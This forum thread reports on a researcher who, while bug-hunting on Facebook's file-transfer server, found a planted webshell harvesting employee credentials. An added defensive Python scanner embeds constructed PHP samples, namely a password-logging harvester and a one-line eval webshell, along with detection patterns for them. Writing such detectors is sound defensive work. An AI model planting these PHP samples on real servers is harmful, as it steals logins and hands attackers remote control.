Bug Hunter Hacks Facebook, Finds Someone Else's Backdoor Script


Alkajak

Thread author
While trying to find bugs in Facebook's services, a security researcher accidentally stumbled over a hacker's backdoor script that was logging Facebook employee credentials for some of the company's backend applications.

Orange Tsai, a consultant for DevCore, also spends a lot of his free time helping big name companies fix vulnerabilities via their bug bounty programs. At the end of February, Tsai decided to give Facebook's bug bounty program another try and started mapping some of the company's backend services for possible servers he might hack.

Researcher hacks Facebook's internal file sharing application

His search led him to the files.fb.com domain, which is an online file transfer and file hosting service, running on Accellion’s Secure File Transfer (FTA) application.

After identifying the application's type and version, the researcher went to work and explored its source code, discovering three cross-site scripting (XSS) flaws, two local privilege escalation issues, a known-secret-key issue that led to remote code execution, and a pre-auth SQL injection that also led to remote code execution.

The researcher used the SQL injection flaw he discovered in the FTA application to access Facebook's server and was rewarded with complete control over the machine.

With his goal reached, the researcher then started collecting the necessary information to submit a bug report to Facebook's staff. While looking at one of the server's logs, Tsai discovered a lot of suspicious error messages.

Somebody had already hacked the server, and not as part of the bug bounty program
He tracked these messages down to a webshell which, he was sure (and it was quite obvious), no Facebook employee had ever uploaded. Inspecting the webshell's source code, Tsai found evidence of a server-side keylogger which was intercepting login operations and storing Facebook employee access credentials in a local log file.

The researcher then looked at other log files that showed how the hacker came back at various intervals to collect the logged data, map the local network, and attempt to steal SSL private keys.

Details revealed two separate periods when the hacker was active, one in July 2015, and then one in mid-September 2015.

Tsai filed a bug report about the incident with Facebook, which started an in-house forensics investigation and rewarded the researcher with $10,000 (€8,850) for his efforts.



The webshell on Facebook's server
 
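The server-side credential logger described in the post above (a script that sits in front of the login, appends the submitted username and password to a local file, and is later collected by whoever planted it) is the kind of artifact a defender hunts for in a web root after an intrusion like this one. The Python scanner below is an added example written for this page; it is not code from the thread, from Orange Tsai, or from Facebook, and the PHP snippets it scans are constructed for illustration and do not reproduce the actual webshell found on files.fb.com. It flags PHP files that both read a password-like request parameter and write to disk (either behaviour alone is normal for a login form or an uploader), and separately flags scripts that hand raw request input to eval or a command-execution function.

```python
import os
import re
from typing import Dict, List

# Constructed PHP sources for illustration; none of these is the real
# script recovered from the Facebook server.
SAMPLES: Dict[str, str] = {
    # Legitimate login handler: reads the password but only verifies it.
    "login.php": r"""<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if (password_verify($pass, lookup_hash($user))) {
    start_session($user);
}
""",
    # Credential harvester in the style the thread describes: captures the
    # submitted credentials, appends them to a hidden log, then hands off
    # to the real login page so the victim notices nothing.
    "sync.php": r"""<?php
$u = $_REQUEST['username'];
$p = $_REQUEST['password'];
file_put_contents('/tmp/.cache/log', "$u:$p\n", FILE_APPEND);
include 'real_login.php';
""",
    # Classic one-line webshell: executes whatever the operator posts.
    "cache.php": r"""<?php @eval($_POST['cmd']); ?>""",
    # Writes a file but never touches a credential parameter.
    "upload.php": r"""<?php
move_uploaded_file($_FILES['f']['tmp_name'], '/var/data/' . basename($_FILES['f']['name']));
""",
}

# A request parameter whose name suggests a password.
PASSWORD_PARAM = re.compile(
    r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[\s*['\"](?:password|passwd|pwd|pass)['\"]\s*\]",
    re.IGNORECASE,
)
# PHP calls that persist data to disk.
FILE_WRITE = re.compile(r"\b(?:file_put_contents|fwrite|fputs)\s*\(", re.IGNORECASE)
# Raw request input handed straight to code or command execution.
EVAL_INPUT = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen)\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def scan_php(source: str) -> List[str]:
    """Return the heuristic labels triggered by one PHP source."""
    findings = []
    # A password read *and* a disk write in the same file is the shape of
    # a harvester; either alone is normal for a login form or uploader.
    if PASSWORD_PARAM.search(source) and FILE_WRITE.search(source):
        findings.append("credential-harvester")
    if EVAL_INPUT.search(source):
        findings.append("webshell")
    return findings


def scan_sources(sources: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a name -> source mapping and keep only files with findings."""
    results = {}
    for name, source in sources.items():
        hits = scan_php(source)
        if hits:
            results[name] = hits
    return results


def scan_directory(root: str) -> Dict[str, List[str]]:
    """Walk a web root on disk and scan every .php file found."""
    sources = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(".php"):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    sources[path] = fh.read()
    return scan_sources(sources)


if __name__ == "__main__":
    for name, hits in scan_sources(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

Point `scan_directory` at a real web root (for example `/var/www`) to triage a suspected server. It is a heuristic, not a signature: it will miss obfuscated shells (base64-encoded payloads, variable function names) and may flag legitimate debugging code, so its job is to shortlist the files worth reading by hand, which is the step that, in the story above, turned a run of odd log errors into a recovered backdoor.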

frogboy

A researcher received $10,000 from Facebook after uncovering a serious vulnerability and a malicious web shell left behind by hackers on one of the social media giant’s servers.

Orange Tsai, a consultant at DevCore, had been analyzing Facebook’s infrastructure when he came across a domain called files.fb.com. The domain hosted a login interface for an Accellion File Transfer Appliance, a device used by enterprises for secure file transfers.

While known vulnerabilities had been patched by Facebook in the Accellion product, the researcher discovered a total of 7 previously unknown issues, including cross-site scripting, local privilege escalation, and remote code execution flaws.

The expert leveraged a pre-auth SQL injection vulnerability that allowed remote code execution to upload a webshell to the Facebook server.

Once he gained control of the server, he started collecting information for a Facebook bug bounty report. That was when he discovered that someone had previously uploaded a webshell to the server.

The malicious attacker had apparently attempted to collect the login credentials of Facebook employees who used the file transfer service. Tsai discovered that the attacker’s script had harvested roughly 300 @fb.com and @facebook.com credentials between February 1 and February 7.

Full article: Researcher Finds Malicious Web Shell on Facebook Server | SecurityWeek.Com
 

kev216

Facebook's internal systems were compromised and a server containing staff details was hit by malware opening up a backdoor that allowed usernames and passwords to be extracted – although this issue was reported by a bug bounty hunter and has since been fixed.

Orange Tsai was the exploit hunter in question, and he discovered the vulnerability in the Facebook server back in February, then reported it to the social network's security team.

As Betanews reports, Tsai hacked into said Facebook server and discovered password-thieving PHP scripts – obviously a very serious issue. So it isn't surprising that he received a large payment for this bit of white hat hacking, and a week after reporting the issue, he was told he'd be rewarded to the tune of $10,000 (around £7,000, or AU$13,000).

It's a worrying glimpse into how even web giants like Zuckerberg's firm are open to being exploited by just a single individual with some hacking smarts.

Note that this was a staff server and the backdoor was pilfering Facebook staff member credentials (as opposed to actual users of the social network), and Tsai says he found around 300 logged credentials dated to the first week of February when he pulled off his hack.

Not malicious
The Facebook security engineer, Reginaldo Silva, who dealt with the case said the backdoor had actually been put there by another bounty hunting security researcher, so this too was a white hat action of sorts, and apparently not a malicious attack.

Silva noted: "Neither of them were able to compromise other parts of our infrastructure, so the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access."

According to Tsai, the other hacker made attempts to probe further and access Facebook's internal mail system, for example, but wasn't successful in these endeavours. Tsai also noted there were two periods of time when the backdoor was utilised last year, and he muses whether this might have been different hackers doing so – although Facebook clearly believes this was just one person.

Of course, the hole has now been patched up and Facebook conducted an extensive forensics investigation over the past couple of months, which was completed last week, leaving Tsai free to post about and discuss the issue.

A detailed guide on how he did it can be found on his blog: How I Hacked Facebook, and Found Someone's Backdoor Script | DEVCORE 戴夫寇爾
 

Noxx

Thread author
Maybe Facebook should spend less time making their site look so unnecessarily complex and spend more time on security. Anyone else wish that they'd just return to the old-school format? I can't stand logging on because it's just clunky as heck.
 
